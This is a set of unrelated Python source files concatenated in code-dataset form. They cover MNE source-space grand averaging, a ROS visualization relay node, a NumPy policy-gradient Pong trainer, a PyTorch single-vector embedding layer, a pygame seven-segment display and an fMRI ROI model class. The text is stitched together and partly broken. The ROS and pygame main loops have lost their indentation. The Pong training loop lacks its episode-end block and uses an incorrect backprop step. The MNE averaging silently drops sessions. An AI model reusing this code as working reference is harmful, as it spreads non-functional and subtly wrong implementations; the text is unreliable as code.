    # config.conditions may be a dict (name -> spec) or a plain sequence.
    conditions = (list(config.conditions.keys())
                  if isinstance(config.conditions, dict)
                  else config.conditions)

    # These pieces of the filename suffix are the same for every condition.
    inverse_str = config.inverse_method
    hemi_str = 'hemi'  # MNE will auto-append '-lh' and '-rh'.
    morph_str = 'morph2fsaverage'

    morphed_stcs = []
    for condition in conditions:
        cond_str = config.sanitize_cond_name(condition)
        fname_in = bids_path.copy().update(
            suffix=f'{cond_str}+{inverse_str}+{hemi_str}')
        fname_out = bids_path.copy().update(
            suffix=f'{cond_str}+{inverse_str}+{morph_str}+{hemi_str}')

        stc = mne.read_source_estimate(fname_in)
        morph = mne.compute_source_morph(
            stc, subject_from=fs_subject, subject_to='fsaverage',
            subjects_dir=fs_subjects_dir)
        stc_fsaverage = morph.apply(stc)
        stc_fsaverage.save(fname_out)
        morphed_stcs.append(stc_fsaverage)

    return morphed_stcs
@failsafe_run(on_error=on_error)
def main():
    """Run group average in source space"""
    msg = 'Running Step 13: Grand-average source estimates'
    logger.info(gen_log_message(step=13, message=msg))
    # Bail out early when source estimation is disabled in the config.
    if not config.run_source_estimation:
        msg = ' … skipping: run_source_estimation is set to False.'
        logger.info(gen_log_message(step=13, message=msg))
        return
    # Make sure the fsaverage template exists before morphing onto it.
    mne.datasets.fetch_fsaverage(subjects_dir=config.get_fs_subjects_dir())
    # Morph every (subject, session) pair's STCs in parallel.
    parallel, run_func, _ = parallel_func(morph_stc, n_jobs=config.N_JOBS)
    all_morphed_stcs = parallel(run_func(subject, session)
                                for subject, session in
                                itertools.product(config.get_subjects(),
                                                  config.get_sessions()))
    # NOTE(review): results arrive per (subject, session) pair, but this zip
    # pairs them against subjects only — with more than one session the tail
    # of `all_morphed_stcs` is silently dropped. Looks related to the
    # "XXX to fix" below; confirm intended behavior for multi-session data.
    all_morphed_stcs = [morphed_stcs for morphed_stcs, subject in
                        zip(all_morphed_stcs, config.get_subjects())]
    # Element-wise sum across subjects, one entry per condition.
    # This is a lazy `map`; it is consumed exactly once by the loop below.
    mean_morphed_stcs = map(sum, zip(*all_morphed_stcs))
    subject = 'average'
    # XXX to fix
    if config.get_sessions():
        session = config.get_sessions()[0]
    else:
        session = None
    bids_path = BIDSPath(subject=subject,
                         session=session,
                         task=config.get_task(),
                         acquisition=config.acq,
                         run=None,
                         processing=config.proc,
                         recording=config.rec,
                         space=config.space,
                         datatype=config.get_datatype(),
                         root=config.get_deriv_root(),
                         check=False)
    if isinstance(config.conditions, dict):
        conditions = list(config.conditions.keys())
    else:
        conditions = config.conditions
    for condition, this_stc in zip(conditions, mean_morphed_stcs):
        # Turn the sum into a mean across subjects.
        this_stc /= len(all_morphed_stcs)
        method = config.inverse_method
        cond_str = config.sanitize_cond_name(condition)
        inverse_str = method
        hemi_str = 'hemi'  # MNE will auto-append '-lh' and '-rh'.
        morph_str = 'morph2fsaverage'
        fname_stc_avg = bids_path.copy().update(
            suffix=f'{cond_str}+{inverse_str}+{morph_str}+{hemi_str}')
        this_stc.save(fname_stc_avg)
    msg = 'Completed Step 13: Grand-average source estimates'
    logger.info(gen_log_message(step=13, message=msg))
if __name__ == '__main__':
    main()
|
<gh_stars>10-100
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import rospy
import tf
import math
from actionlib_msgs.msg import GoalID
from geometry_msgs.msg import PoseWithCovarianceStamped
from geometry_msgs.msg import PoseStamped
from visualization_msgs.msg import Marker
class VisualizationClass:
    """Visualization relay node for a 'portable' ninebot robot.

    Continuously re-broadcasts the robot pose (global_frame -> base_frame)
    as `portable_frame` under the server frame, relays RViz initial-pose
    and goal messages into the local frame, and publishes/deletes a
    cylinder marker at the current navigation goal.
    """
    def __init__(self):
        rospy.init_node('ninebot_visualization', anonymous=True)
        # BUG FIX: Marker.id is an int32 field, but the parameter arrives
        # as a string (default '1'); convert once here so publishing the
        # marker does not fail at serialization time.
        self.portable_number = int(rospy.get_param('~portable_number', '1'))
        self.portable_frame = rospy.get_param('~portable_frame_id', 'pot_1')
        self.global_frame = rospy.get_param('~global_frame_id', 'map1')
        self.base_frame = rospy.get_param('~base_frame_id', 'base_footprint1')
        self.server_frame = rospy.get_param('~server_frame_id', 'server_map')
        # Goal markers: one topic in the server frame, one in the local frame.
        self.marker_pub1 = rospy.Publisher('/target_s_' + self.portable_frame, Marker, queue_size=10)
        self.marker_pub2 = rospy.Publisher('target_' + self.portable_frame, Marker, queue_size=10)
        # Relays for RViz-issued initial pose and goal.
        self.start_pub = rospy.Publisher('initialpose', PoseWithCovarianceStamped, queue_size=10)
        self.goal_pub = rospy.Publisher('move_base_simple/goal', PoseStamped, queue_size=10)
        rospy.Subscriber('move_base_simple/goal', PoseStamped, self.callback_goal, queue_size=10)
        rospy.Subscriber('move_base/cancel', GoalID, self.callback_cancel, queue_size=10)
        rospy.Subscriber('/initialpose', PoseWithCovarianceStamped, self.callback_rviz_start, queue_size=10)
        rospy.Subscriber('/move_base_simple/goal', PoseStamped, self.callback_rviz_goal, queue_size=10)
        rate = rospy.Rate(10)  # 10 Hz re-broadcast loop
        listener = tf.TransformListener()
        broadcaster = tf.TransformBroadcaster()
        # NOTE: this loop blocks __init__ until shutdown by design — the
        # node's whole job is this mirror loop plus the callbacks above.
        while not rospy.is_shutdown():
            try:
                (point, quate) = listener.lookupTransform(self.global_frame, self.base_frame, rospy.Time(0))
                broadcaster.sendTransform((point[0], point[1], 0.0), \
                        (quate[0], quate[1], quate[2], quate[3]), \
                        rospy.Time.now(), self.portable_frame, self.server_frame)
            except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
                pass  # transform not available yet; retry on the next tick
            rate.sleep()

    def callback_goal(self, data):
        """Draw a cylinder marker at the received goal, in both frames."""
        marker = Marker()
        marker.id = self.portable_number
        marker.header.stamp = rospy.Time.now()
        marker.type = 3  # cylinder
        marker.action = 0  # add
        marker.scale.x = 0.2
        marker.scale.y = 0.2
        marker.scale.z = 1.0
        marker.color.r = 1
        marker.color.g = 1
        marker.color.b = 1
        marker.color.a = 1.0
        marker.lifetime = rospy.Duration()
        marker.pose.position = data.pose.position
        marker.pose.orientation = data.pose.orientation
        marker.pose.position.z = 0.3  # lift the cylinder off the floor
        marker.header.frame_id = self.server_frame
        self.marker_pub1.publish(marker)
        marker.header.frame_id = self.global_frame
        self.marker_pub2.publish(marker)

    def callback_cancel(self, data):
        """Remove the goal marker when the navigation goal is cancelled."""
        marker = Marker()
        marker.id = self.portable_number
        marker.action = 2  # delete
        self.marker_pub1.publish(marker)
        self.marker_pub2.publish(marker)

    def callback_rviz_start(self, data):
        """Re-stamp an RViz initial pose with the local frame and relay it."""
        data.header.frame_id = self.global_frame
        self.start_pub.publish(data)

    def callback_rviz_goal(self, data):
        """Re-stamp an RViz goal with the local frame and relay it."""
        data.header.frame_id = self.global_frame
        self.goal_pub.publish(data)
if __name__ == '__main__':
try:
VisualizationClass()
except rospy.ROSInterruptException:
rospy.loginfo("ninebot_visualization node finished.") |
import gym
import numpy as np  # BUG FIX: was `import np`, which fails at import time
import numpy

# hyperparameters
episode_number = 0
batch_size = 10  # update weights every `batch_size` episodes
gamma = 0.99  # discount factor for reward
decay_rate = 0.99  # RMSProp decay
num_hidden_layer_neurons = 200
n = 80  # edge length of the downsampled frame
input_dimensions = 80 * 80
learning_rate = 1e-4
def average_color(a, b, c, d, i):
    """Return the mean of colour channel `i` across the four pixels a-d.

    BUG FIX: the original ignored `i` and always read channel 0, so the
    downsampled frame lost all information from channels 1 and 2 even
    though callers pass i = 0, 1, 2.
    """
    return (int(a[i]) + int(b[i]) + int(c[i]) + int(d[i])) / 4
# Halve the resolution: [160,160,3] -> [80,80,3]
def downsample(observation):
    """Shrink the frame 2x by averaging each 2x2 pixel block per channel."""
    output = np.zeros((n, n, 3))
    for row in range(n):
        for col in range(n):
            block = (observation[2 * row, 2 * col],
                     observation[2 * row, 2 * col + 1],
                     observation[2 * row + 1, 2 * col],
                     observation[2 * row + 1, 2 * col + 1])
            output[row, col] = [average_color(*block, channel)
                                for channel in range(3)]
    return output
# Collapse colour: [80,80,3] -> [80,80]
def remove_color(observation):
    """Convert an RGB frame to grayscale by averaging the three channels."""
    output = np.zeros((n, n))
    for row in range(n):
        for col in range(n):
            r, g, b = observation[row, col]
            output[row, col] = (r + g + b) / 3
    return output
# [80,80] -> [80,80]
def remove_background(observation):
    """Identity pass-through: background removal is not implemented here."""
    return observation
# input: numeric array of any shape
# output: same shape, negative entries clamped to zero
def relu(input):
    """Rectified linear unit: max(x, 0) element-wise.

    BUG FIX: the original merely transposed its argument, so the network
    had no nonlinearity at all and the shapes in compute_gradient's
    backward pass did not line up with weights['1'].
    """
    return numpy.maximum(input, 0)
def sigmoid(x):
    """Logistic function: squash any real input into the interval (0, 1)."""
    denominator = 1 + np.exp(-x)
    return 1 / denominator
def choose_action(up_probability):
    """Map the network's "move up" probability to a Pong action.

    BUG FIX: the original returned int(p + 0.5), i.e. 0 or 1, which are
    NOOP/FIRE in Pong-v0 — the paddle never moved, and the
    `action == 2` check used to build the fake label in main() could
    never be true. Pong's movement actions are 2 = UP, 3 = DOWN.
    """
    return 2 if up_probability >= 0.5 else 3
def discount_with_rewards(episode_gradient_log_ps, episode_rewards, gamma):
    """Weight the policy gradients by discounted, standardized rewards.

    BUG FIX: the original was a stub that returned the gradients
    unchanged, so rewards never influenced learning. This implements the
    standard policy-gradient reward discounting: accumulate gamma-decayed
    returns backwards in time, resetting at each non-zero reward (a game
    boundary in Pong), then standardize to control gradient variance.
    """
    discounted_rewards = np.zeros_like(episode_rewards, dtype=np.float64)
    running_add = 0.0
    for t in reversed(range(len(episode_rewards))):
        if episode_rewards[t] != 0:
            running_add = 0.0  # game boundary: the return does not leak across points
        running_add = running_add * gamma + episode_rewards[t]
        discounted_rewards[t] = running_add
    # Standardize (zero mean, unit variance) before scaling the gradients.
    discounted_rewards -= np.mean(discounted_rewards)
    discounted_rewards /= np.std(discounted_rewards)
    return episode_gradient_log_ps * discounted_rewards
def preprocess_observations(input_observation, prev_processed_observation, input_dimensions):
    """ convert the 210x160x3 uint8 frame into a 6400 float vector """
    processed_observation = input_observation[35:195]  # crop to the play field
    processed_observation = downsample(processed_observation)
    processed_observation = remove_color(processed_observation)
    processed_observation = remove_background(processed_observation)
    # Convert from 80 x 80 matrix to a flat 6400-element vector.
    # BUG FIX: np.float was deprecated in NumPy 1.20 and later removed;
    # the builtin float is the documented replacement.
    processed_observation = processed_observation.astype(float).ravel()
    # (BUG FIX: a leftover debug block here printed every distinct pixel
    # value with Python-2 `print x` — a SyntaxError under Python 3 — and
    # did an O(n^2) list-membership scan per frame; removed.)
    processed_observation[processed_observation != 0] = 1  # everything else (paddles, ball) just set to 1
    # subtract the previous frame from the current one so we are only processing on changes in the game
    if prev_processed_observation is not None:
        input_observation = processed_observation - prev_processed_observation
    else:
        input_observation = np.zeros(input_dimensions)
    # store the previous frame so we can subtract from it next time
    prev_processed_observations = processed_observation
    return input_observation, prev_processed_observations
def apply_neural_nets(observation_matrix, weights):
    """Forward pass: observation -> hidden activations -> P(move up).

    Returns the hidden-layer values (needed later for backprop) together
    with the sigmoid output of the second layer.
    """
    hidden_layer_values = relu(np.dot(weights['1'], observation_matrix))
    output_layer_values = sigmoid(np.dot(weights['2'], hidden_layer_values))
    return hidden_layer_values, output_layer_values
def compute_gradient(gradient_log_p, hidden_layer_values, observation_values, weights):
    """Backpropagate the episode's log-probability gradients through both
    layers. See here: http://neuralnetworksanddeeplearning.com/chap2.html
    """
    delta_L = gradient_log_p
    # Gradient for the output layer weights.
    dC_dw2 = np.dot(hidden_layer_values.T, delta_L).ravel()
    # Propagate the error back through the hidden layer.
    delta_l2 = relu(np.outer(delta_L, weights['2']))
    dC_dw1 = np.dot(delta_l2.T, observation_values)
    return {'1': dC_dw1, '2': dC_dw2}
def update_weights(weights, expectation_g_squared, g_dict, decay_rate, learning_rate):
    """One RMSProp step, applied in place to `weights`.
    See here: http://sebastianruder.com/optimizing-gradient-descent/index.html#rmsprop
    """
    epsilon = 1e-5  # guards against division by zero
    for name, w in weights.items():
        grad = g_dict[name]
        # Exponential moving average of the squared gradient.
        cache = decay_rate * expectation_g_squared[name] + (1 - decay_rate) * grad ** 2
        expectation_g_squared[name] = cache
        w += (learning_rate * grad) / (np.sqrt(cache + epsilon))
        g_dict[name] = np.zeros_like(w)  # reset batch gradient buffer
def main():
    """Train a one-hidden-layer policy network on Pong with RMSProp."""
    env = gym.make("Pong-v0")
    observation = env.reset() # This gets us the image
    episode_number = 0
    reward_sum = 0
    running_reward = None
    prev_processed_observations = None
    # Xavier-style initialization: layer 1 maps the 6400-pixel frame to the
    # hidden units, layer 2 maps hidden units to a single logit.
    weights = {
        '1': np.random.randn(num_hidden_layer_neurons, input_dimensions) / np.sqrt(input_dimensions),
        '2': np.random.randn(num_hidden_layer_neurons) / np.sqrt(num_hidden_layer_neurons)
    }
    # To be used with rmsprop algorithm (http://sebastianruder.com/optimizing-gradient-descent/index.html#rmsprop)
    expectation_g_squared = {}
    g_dict = {}
    for layer_name in weights.keys():
        expectation_g_squared[layer_name] = np.zeros_like(weights[layer_name])
        g_dict[layer_name] = np.zeros_like(weights[layer_name])
    # Per-episode buffers, appended to on every frame.
    episode_hidden_layer_values, episode_observations, episode_gradient_log_ps, episode_rewards = [], [], [], []
    while True:
        env.render()
        processed_observations, prev_processed_observations = preprocess_observations(observation, prev_processed_observations, input_dimensions)
        hidden_layer_values, up_probability = apply_neural_nets(processed_observations, weights)
        episode_observations = numpy.append(episode_observations, processed_observations)
        episode_hidden_layer_values.append(hidden_layer_values)
        action = choose_action(up_probability)
        # carry out the chosen action
        observation, reward, done, info = env.step(action)
        reward_sum += reward
        episode_rewards.append(reward)
        # see here: http://cs231n.github.io/neural-networks-2/#losses
        fake_label = 1 if action == 2 else 0
        loss_function_gradient = fake_label - up_probability
        episode_gradient_log_ps.append(loss_function_gradient)
        # NOTE(review): everything below runs on EVERY frame, but vstack-ing
        # the buffers, computing the batch gradient, and checking
        # `episode_number % batch_size` only make sense at episode end —
        # this looks like a lost `if done:` block. After the first vstack
        # the buffers become arrays and are never reset, and
        # `episode_number` is never incremented (and `done`/`observation`
        # are not handled via env.reset()). Confirm against the original
        # tutorial before relying on this loop.
        # Combine the following values for the episode
        episode_hidden_layer_values = np.vstack(episode_hidden_layer_values)
        episode_observations = np.vstack(episode_observations)
        episode_gradient_log_ps = np.vstack(episode_gradient_log_ps)
        episode_rewards = np.vstack(episode_rewards)
        # Tweak the gradient of the log_ps based on the discounted rewards
        episode_gradient_log_ps_discounted = discount_with_rewards(episode_gradient_log_ps, episode_rewards, gamma)
        gradient = compute_gradient(
            episode_gradient_log_ps_discounted,
            episode_hidden_layer_values,
            episode_observations,
            weights
        )
        if episode_number % batch_size == 0:
            update_weights(weights, expectation_g_squared, g_dict, decay_rate, learning_rate)
main()
|
<reponame>takase/alone_seq2seq
import math
import os
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
class OneEmbed(nn.Module):
    """Embedding layer built from a single shared weight vector.

    Every token's embedding is the shared `self.weight` vector multiplied
    element-wise by a token-specific mask, then passed through a small
    feed-forward network (`layernum` linear layers with ReLU + dropout in
    between). Masks are the sum of `codebooknum` codebook entries chosen
    by random hashes; 'binary' masks come from Bernoulli draws (clamped
    to [0, 1] after summing), otherwise Gaussian perturbations are used.
    The per-token mask matrix is cached to `mask_file` and reloaded on
    subsequent runs.
    """
    def __init__(self, num_embeddings, embedding_dim, padding_idx=None, one_emb_type='binary', dropout=0.5, std=1.0, codenum=64, codebooknum=8, layernum=1, interdim=0, relu_dropout=0.1, mask_file=''):
        """Build (or load) the token masks and the projection layers.

        Args:
            num_embeddings: vocabulary size.
            embedding_dim: output embedding dimension.
            padding_idx: index whose mask embedding lookup uses padding.
            one_emb_type: 'binary' for Bernoulli masks, anything else for
                Gaussian masks.
            dropout: target drop probability used to derive the Bernoulli
                keep-rate per codebook.
            std: overall standard deviation for Gaussian masks.
            codenum: number of rows in each codebook.
            codebooknum: number of codebooks summed per token.
            layernum: number of linear layers applied after masking.
            interdim: hidden width of those layers (0 -> embedding_dim).
            relu_dropout: dropout rate between the linear layers.
            mask_file: path used to cache the per-token mask matrix.
        """
        super(OneEmbed, self).__init__()
        self.num_embeddings = num_embeddings
        self.embedding_dim = embedding_dim
        self.one_emb_type = one_emb_type
        self.layernum = layernum
        self.relu_dropout = relu_dropout
        if padding_idx is not None:
            if padding_idx > 0:
                assert padding_idx < self.num_embeddings, 'Padding_idx must be within num_embeddings'
            elif padding_idx < 0:
                assert padding_idx >= -self.num_embeddings, 'Padding_idx must be within num_embeddings'
                # Normalize a negative padding index to its positive form.
                padding_idx = self.num_embeddings + padding_idx
        self.padding_idx = padding_idx
        self.weight = Parameter(torch.Tensor(1, embedding_dim)) #embedding for all tokens
        if interdim == 0:
            interdim = embedding_dim
        # layernum linear maps: embedding_dim -> interdim -> ... -> embedding_dim
        # (a single layer is embedding_dim -> interdim by the first branch).
        self.weight_matrices = nn.ParameterList([nn.Parameter(torch.Tensor(embedding_dim, interdim)) if i+1 == self.layernum else (nn.Parameter(torch.Tensor(interdim, embedding_dim)) if i == 0 else nn.Parameter(torch.Tensor(interdim, interdim))) for i in range(self.layernum)])
        if os.path.isfile(mask_file):
            # Reuse previously generated masks so token identities stay stable.
            self.mask = torch.load(mask_file)
        else:
            if self.one_emb_type == 'binary':
                # Keep-probability per codebook so that the product over
                # codebooks matches the requested dropout rate.
                prob = torch.Tensor(codenum, embedding_dim)
                nn.init.constant_(prob, (1 - dropout ** (1.0 / codebooknum)))
                self.masklist = [torch.bernoulli(prob) for _ in range(codebooknum)]
            else:
                # Gaussian codebooks; variance split evenly across codebooks.
                mean_m = torch.zeros(codenum, embedding_dim)
                std_m = torch.Tensor(codenum, embedding_dim)
                nn.init.constant_(std_m, std * (codebooknum ** -0.5))
                self.masklist = [torch.normal(mean_m, std_m) for _ in range(codebooknum)]
            # Random code assignment: one codebook row index per (token, codebook).
            self.hash2mask = torch.randint(0, codenum, (num_embeddings, codebooknum), dtype=torch.long)
            self.mask = self.construct_mask2each_token() #mask for each token
            # Persist the masks so later runs reload identical embeddings.
            dirname = '/'.join(mask_file.split('/')[:-1])
            if not os.path.isdir(dirname):
                os.makedirs(dirname)
            torch.save(self.mask, mask_file)
    def construct_mask2each_token(self):
        """Sum each token's codebook entries into one mask per token.

        Returns a (num_embeddings, embedding_dim) tensor; binary masks are
        clamped to [0, 1] so overlapping codebooks stay boolean-like.
        """
        mask = []
        for i in range(self.hash2mask.size(1)):
            token_hash = self.hash2mask[:, i]
            mask.append(nn.functional.embedding(token_hash, self.masklist[i], padding_idx=self.padding_idx))
        mask = sum(mask)
        if self.one_emb_type == 'binary':
            mask.clamp_(0, 1)
        return mask
    def construct_matrix_for_output_layer(self):
        """Materialize embeddings for the whole vocabulary (dropout off),
        e.g. for weight tying with an output projection layer."""
        vocab_vec = self.mask.new(range(self.num_embeddings)).long()
        matrix = self.forward(vocab_vec, dropout=0)
        return matrix
    def forward(self, input, dropout=None):
        """Embed token indices `input`; `dropout` overrides relu_dropout
        when given (0 disables dropout regardless of training mode)."""
        # Lazily move the cached mask to GPU the first time CUDA input arrives.
        if input.is_cuda and not self.mask.is_cuda:
            self.mask = self.mask.cuda()
        relu_dropout = self.relu_dropout if dropout is None else dropout
        each_token_mask = nn.functional.embedding(input, self.mask, padding_idx=self.padding_idx)
        # Masked copy of the single shared embedding vector.
        embed = each_token_mask * self.weight.expand_as(each_token_mask)
        for i in range(self.layernum):
            embed = nn.functional.linear(embed, self.weight_matrices[i])
            if i+1 != self.layernum:
                # ReLU + dropout between layers, but not after the last one.
                embed = nn.functional.relu(embed)
                embed = nn.functional.dropout(embed, p=relu_dropout, training=self.training)
        return embed
|
import pygame
from sys import exit
width=360
height=515
fps = 30
black = (0,0,0)
bar_img_active_horizontal = pygame.image.load('bar.png')
bar_img_active_vertical = pygame.transform.rotate(bar_img_active_horizontal,90)
bar_img_deactive_horizontal = pygame.image.load('bar2.png')
bar_img_deactive_vertical = pygame.transform.rotate(bar_img_deactive_horizontal,90)
#for display
pygame.init()
screen=pygame.display.set_mode((width,height))
pygame.display.set_caption("Display")
clock=pygame.time.Clock()
class Bar(pygame.sprite.Sprite):
    """One segment of the seven-segment digit display.

    Swaps between the active and inactive bar images (in the configured
    orientation) whenever its `active` flag changes.
    """

    def __init__(self, x, y, active, orientation='horizontal'):
        pygame.sprite.Sprite.__init__(self)
        self.x = x
        self.y = y
        self.active = active
        self.image = bar_img_deactive_horizontal
        self.image.set_colorkey(black)
        self.rect = self.image.get_rect()
        self.rect.center = (self.x, self.y)
        self.old_active = False  # forces an image refresh on first update
        self.orientation = orientation

    def update(self):
        # Only swap images when the active state actually changed.
        if self.old_active == self.active:
            return
        self.old_active = self.active
        vertical = self.orientation == "vertical"
        if self.active:
            self.image = bar_img_active_vertical if vertical else bar_img_active_horizontal
        else:
            self.image = bar_img_deactive_vertical if vertical else bar_img_deactive_horizontal
#sprite groups
all_sprite = pygame.sprite.Group()
bar = Bar(width//2, 30, True, "horizontal")
bar1 = Bar(width//2,height//2, True, "horizontal")
bar2 = Bar(width//2, height - 30, True, "horizontal")
bar3 = Bar(160, 60, True, "vertical")
bar4 = Bar(370, 60, True, "vertical")
bar5 = Bar(160, 290,True,'vertical')
bar6 = Bar(370,290, True,'vertical')
bars = [bar,bar1,bar2,bar3,bar4,bar5,bar6]
all_sprite.add(bars)
#NUMBERS
NUMBERS = [
[1, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 0, 1],
[1, 1, 1, 0, 1, 1, 0],
[1, 1, 1, 0, 1, 0, 1],
[0, 1, 0, 1, 1, 0, 1],
[1, 1, 1, 1, 0, 0, 1] ,
[1, 1, 1, 1, 0, 1, 1],
[1, 0, 0, 0, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0, 1]
]
#game loop
current_no = 0
run=True
last_time_changed = pygame.time.get_ticks()
while run:
#clock spped
clock.tick(fps)
#input(events)
for event in pygame.event.get():
if event.type==pygame.QUIT:
run=False
#update
if pygame.time.get_ticks() - last_time_changed >= 1000:
last_time_changed = pygame.time.get_ticks()
if current_no == 9 : current_no = 0
else : current_no += 1
i = 0
for b in bars:
b.active = NUMBERS[current_no][i]
i += 1
all_sprite.update()
#Draw/render
screen.fill(black)
all_sprite.draw(screen)
pygame.display.flip()
pygame.quit()
exit() |
<reponame>parenthetical-e/fmri
""" Another (sub)set of models, this one contains only those with literature
driven RL (or related) terms. Prior analyses were more exploratory.
In this set we allow for seperate regressors matching behavoiral accuracy,
as well as inverted and positive-value-only coding schemes. """
from roi.base import Mean
class Rewardrecode(Mean):
""" A Roi analysis class, customized for the catreward project.
Unlike Catreward, this reads in the average bold data from a
text file. """
def __init__(self, TR, roi_name, trials, durations, data):
Mean.__init__(self, TR, roi_name, trials, durations, data)
self.data['meta']['bold'] = self.roi_name
self.create_bold(preprocess=True)
self.create_hrf(function_name='double_gamma')
# --
# Accuracy
def model_0101(self):
""" Behavioral accuracy. """
data_to_use = ['acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0102(self):
""" Behavioral accuracy, diminished by (exponential) similarity. """
data_to_use = ['acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0103(self):
""" Behavioral accuracy, diminished by (gaussian) similarity. """
data_to_use = ['acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Gains and losses
def model_0201(self):
""" Gains and losses. """
data_to_use = ['gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0202(self):
""" Gains and losses, diminished by (exponential) similarity. """
data_to_use = ['gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0203(self):
""" Gains and losses, diminished by (gaussian) similarity. """
data_to_use = ['gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l into 2 regressors
def model_0301(self):
""" Gains and losses, in 2 regressors. """
data_to_use = ['gl_1', 'gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0302(self):
""" Gains and losses, diminished by (exponential) similarity,
in 2 regressors. """
data_to_use = ['gl_exp_1', 'gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0303(self):
""" Gains and losses, diminished by (gaussian) similarity,
in 2 regressors. """
data_to_use = ['gl_gauss_1', 'gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
# RPE
def model_0401(self):
""" RPE - derived from accuracy. """
data_to_use = ['rpe_acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0402(self):
""" RPE - derived from accuracy diminished by (exponential)
similarity. """
data_to_use = ['rpe_acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0403(self):
""" RPE - derived from accuracy diminished by (gaussian)
similarity. """
data_to_use = ['rpe_acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
## VALUE
def model_0501(self):
""" Value - derived from accuracy. """
data_to_use = ['value_acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0502(self):
""" Value - derived from accuracy diminished by (exponential)
similarity. """
data_to_use = ['value_acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0503(self):
""" Value - derived from accuracy diminished by (gaussian)
similarity. """
data_to_use = ['value_acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_0701(self):
""" RPE - derived from gains and loses. """
data_to_use = ['rpe_gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0702(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['rpe_gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0703(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['rpe_gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_0801(self):
""" Value - derived from gains and losses. """
data_to_use = ['value_gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0802(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['value_gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0803(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['value_gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_0901(self):
""" RPE - derived from gains and loses. """
data_to_use = ['rpe_gl_1', 'rpe_gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0902(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['rpe_gl_exp_1', 'rpe_gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0903(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['rpe_gl_gauss_1', 'rpe_gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_1001(self):
""" Value - derived from gains and losses. """
data_to_use = ['value_gl_1', 'value_gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1002(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['value_gl_exp_1', 'value_gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1003(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['value_gl_gauss_1', 'value_gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# INVERTED VALUES
# --
# Gains and losses INVERTED
def model_1101(self):
""" Gains and losses. Reward coding inversed. """
data_to_use = ['gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
